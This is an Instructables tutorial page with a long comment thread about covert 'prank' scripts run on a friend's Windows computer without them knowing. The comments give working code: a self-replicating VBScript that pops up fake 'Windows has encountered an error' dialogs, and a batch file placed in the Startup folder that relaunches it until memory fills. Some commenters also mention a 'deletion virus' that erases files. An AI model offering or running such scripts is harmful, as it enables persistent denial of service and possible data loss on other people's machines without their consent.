3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

How to freak out your friends (with their computer) [Tricks and Fun Volume 1]

How to freak out your friends (with their computer) [Tricks and Fun Volume 1]
In this instructable I will show you how to do stuff on anyone's computer and freak them out!

Note: Please read the instructions carefully before trying to attempt this. No harm can be caused by this .vbs file. If you use the instructions wrongly (i.e mistake in typing codes) i will not be held for anything.

The first instructable will show you how to make a message box that comes alot of times onto the screen.
What the message box says is up to you.

You will need about 4-9 minutes to do (one of these) so try to convince your friend to let you use the computer alone for a while, or, do this when they are at the washroom!

Now, lets continue with the Instructables!!
 
Remove these adsRemove these ads by Signing Up
 

Step 1

« Previous StepDownload PDFView All StepsNext Step »
55 comments
1-40 of 55next »
Apr 29, 2012. 2:00 PMmsw100 says:
I don't think this sort of rubbish should be on this site, and I am surprised the moderators let it. Maybe it because they knew it doesn't do what it says as far as destroying a machine
Apr 29, 2012. 1:53 PMmsw100 says:
That code will not destroy a system, it only a matter of re-formatting and installing the OS, All it will do is get you a smack in the mouth from the owner
Oct 1, 2011. 9:48 PMSwordAce says:
You could also say ":LOOP msgbox "Windows has encountered an serious error and cannot continue.",89, "ERROR" GOTO LOOP" (do not add the quotation marks at the VERY end of the code (not the message) and the very begging (not the message) if you are posting the code! Do that for SUPREME impact on your PC!
Apr 1, 2009. 12:05 AMMaster Plastik says:
The fact that you think it's unfixable makes this a pretty malicious instructable, but the fact is that both pranks are easily fixable, and for the first one you don't even need to close all the popups. All you have to do is start the computer in Safe Mode (which doesn't open anything in the startup folder) and delete the .vbs files you created and restart.
Jul 29, 2010. 11:08 AMdllhacker says:
can you also fix the blue screen of death that way? i don't think you could fix it by going into safe mode because the instructions said it deletes the system files.
Jun 4, 2011. 10:42 AMSuper_Nerd says:
If you have file recovery software on an external HDD you might be able to recover your files.
Oct 5, 2010. 7:11 PMmichaelb958 says:
Suggestion: Save this as error.vbs, removing the number at the start of each line.

1 set z = createobject("wscript.shell")
2 do
3 z.run "error.vbs"
4 msgbox "Windows has encountered an error and cannot continue.", 16, "ERROR"
5 loop

It opens itself before displaying the message, and the thing it opened does the same. Also, when one message is acknowledged, it opens two more!
Mar 29, 2009. 1:31 AMcanno says:
lol nice is there a way to make something like this on a macosx notebook
Oct 20, 2009. 8:18 PMgreenbean says:
There is a program similar to CMD on Macs. You could look into that.
Mar 28, 2009. 11:22 AMjdege says:
Wouldn't it be easier to use a for loop?
Mar 28, 2009. 12:58 PMKiteman says:
Wouldn't a loop trap it?
Oct 20, 2009. 8:17 PMgreenbean says:
It can in certain circumstances. See this instructable: www.instructables.com/id/Freezing-lots-of-Computers-at-Once/
Mar 31, 2009. 6:42 AMKiteman says:
Ah, that's what I thought.
Mar 28, 2009. 5:01 PMNachoMahma says:
. Not sure what you mean by "trap it" but a loop would allow using only one file (or should, I'm not familiar with VBasic).
Mar 28, 2009. 5:08 PMKiteman says:
Me either - I just assumed that, since the numbered version jams the computer until all the numbered steps are done, a looped version would trap it forever.
Mar 28, 2009. 7:32 PMNachoMahma says:
. Ah. A FOR loop has limits. Eg, in pseudo-code:
for x = 1 to 5  msgbox "msg text",89, "window name"next x
would (hopefully) display 5 instances of the dialog box.
Mar 30, 2009. 1:08 AMfrollard says:
by trap he means it wouldnt display the next until the first was clicked, as the msgbox event returns a value, and the loop cannot continue without that value.
Apr 26, 2009. 7:11 AMwatermelonhead says:
you know, this is like a real virus
Aug 25, 2009. 10:35 PMoctavian234 says:
no its not it doesnt replicate
Oct 20, 2009. 8:12 PMgreenbean says:
If you bring it onto the victim's computer from a host, such as a USB flash drive, then it is considered a virus. And we can all agree that the common usage of the term "virus" is any malware. This is very obviously a harmful bit of code.
Jul 29, 2010. 11:03 AMdllhacker says:
can't it be fixed if you reinstall the computer with a new cd for the operating system? although it will be fixed you won't have all your files back unless you save some of them in another computer or something right?
Jun 29, 2009. 8:36 PMmiddletonaustin95 says:
(removed by author or community request)
Sep 12, 2009. 1:18 PMcons11 says:
the CMD command runs on me for even a minute...hehehe...maybe there's a virus on the PC eliminating it from running,to stop the user from removing it(the virus is what i'm talking about)
Oct 20, 2009. 7:57 PMgreenbean says:
Actually, Your code just tells the cmd to open, erase everything, and then shut off the computer. The CMD can close before the computer is completely off, and if it is fast enough, it caould theoretically flash.
Sep 25, 2009. 5:34 PMmiddletonaustin95 says:
this time i tested the new one to make sure it worked and it did
Jul 14, 2009. 11:29 AMmiddletonaustin95 says:
-i would put this in the startup folder -type this in notepad -make sure you make the .bat file and the .vbs file -this is for XP @echo off cd "C:\documents and settings\all users\start menu\programs\startup" :A start virus.vbs goto A -save it as a .bat file in "C:\documents and settings\all users\start menu\programs\startup -this one is for vista @echo off cd "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" :A start virus.vbs goto A -save it as a .bat file in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" -type this in notepad -this is for XP and vista do msgbox "Windows has encountered an error and cannot continue." ,48, "ERROR CODE:9001" loop -save it as virus.vbs in your startup folder (where you put the .bat file) -make sure the .vbs file says do msgbox ... loop -there should only be three lines -this will keep opening the virus.vbs until the ram is full
Mar 29, 2009. 11:26 AMBremer1281 says:
OH MY GOD I LOVE THIS THING!!! I just freaked out my mom on her computer and it was hilarious. unfortunately my dad figured it out and got mad at me because I titled it VIRUS and ya...... one thing you might concider is making it more obvious that it has to be a .vbs file or else it opens up the notepad document. but it rules and was funneeeeeeeeeeeeeee!!!
Apr 3, 2009. 4:57 PMicampwithAR says:
dude i copied and pasted the code for the deletion virus and did all the other stuff and it doesnt work i tried to do it on my friends windows 98 comp and it said unknown file cannot complete or w/e so yea it didnt work any suggestions???
Apr 4, 2009. 12:07 PMicampwithAR says:
also it didnt work on vista so ur saying that it will only work on xp?
1-40 of 55next »

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
10
Followers
4
Author:Master Of Hacks